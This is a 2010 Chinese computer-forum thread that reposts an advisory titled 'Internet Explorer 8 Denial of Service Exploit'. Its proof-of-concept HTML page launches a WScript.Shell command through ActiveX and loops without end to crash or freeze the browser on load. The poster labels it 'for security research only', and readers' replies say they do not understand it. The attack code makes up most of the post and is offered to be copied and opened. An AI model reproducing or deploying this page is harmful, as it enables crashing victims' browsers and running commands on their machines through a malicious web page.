电脑疯子技术论坛|电脑极客社区

微信扫一扫 分享朋友圈

已有 1119 人浏览分享

新年,好东西大家分享。刚刚拿到的。同时请IE8用户注意。

   关闭 [复制链接]
1119 5
本帖最后由 bek 于 2010-2-16 02:46 编辑

  1. =======================================================================

  2.                       Internet Explorer 8 (Multitudinous looping )Denial of Service Exploit =======================================================================

  3. # code by Asheesh kumar Mani Tripathi

  4. # email informationhacker08@gmail.com

  5. # company       aksitservices

  6. # Credit by Asheesh Anaconda


  7. #Download http://www.microsoft.com/windows/internet-explorer/worldwide-sites.aspx
  8. #Greets to Bhudeo Prasad for making shell script :)


  9. #Background

  10. Internet Explorer 8 is a popular internet browser. with lots of bugs .....:)

  11. #Vulnerability
  12. This bug is a typical result of multitudinous  loop.
  13. The flaw exists within "history go" ActiveX control which contains
  14. stack based overflow conditions.User interaction is required to
  15. exploit this vulnerability in that the target must visit a malicious
  16. web page.


  17. #Impact

  18. Attacker Can run any windows command ,consume lots of memory and able to crash your IE or make
  19. your system unaccessible,your work if any   might be lost

  20. #Proof of concept
  21. copy the code in text file and save as "asheesh.html" open in Internet Explorer 8

  22. ========================================================================================================================

  23.                                                            asheesh.html
  24. ========================================================================================================================
  25. <html>
  26. <title>asheesh kumar mani tripathi</title>

  27. <head>
  28. <script type="text/javascript">
  29. function sucks()
  30. {

  31. var shell=new ActiveXObject("WScript.Shell");
  32. shell.Run("ipconfig", 1);

  33. }

  34. function asheesh()
  35. {
  36. sucks();
  37. window.onerror=new Function("history.go(0)");
  38. window.print();
  39. asheesh();


  40. }
  41. asheesh();
  42. </script>
  43. </head>
  44. <body onLoad="asheesh()"></body>

  45. </html>


  46. ========================================================================================================================




  47. #刚刚拿到的。和大家分享。(方法)可能带有攻击性,仅供安全研究之用,风险自负!
复制代码

评论 5

l6688 l6688  正式会员  发表于 2010-3-23 16:48:33 | 显示全部楼层
什么东西哦?????

看不明白

souona souona  VIP荣誉会员  发表于 2010-4-12 11:35:56 | 显示全部楼层
好东西。。。厉害厉害

孤叶飘翎 孤叶飘翎  初级会员  发表于 2010-5-14 14:04:09 | 显示全部楼层
一头雾水。不明白。

good_0006 good_0006  合格会员  发表于 2010-6-21 12:46:04 | 显示全部楼层
不懂,请高人批讲!{:3_237:}

ektha4683 ektha4683  VIP荣誉会员  发表于 2011-6-24 21:25:24 | 显示全部楼层
LZ是否应当给我们解释一下 看不明白

您需要登录后才可以回帖 登录 | 注册

本版积分规则

1

关注

23

粉丝

2901

主题
精彩推荐
热门资讯
网友晒图
图文推荐

Powered by Pcgho! X3.4

© 2008-2022 Pcgho Inc.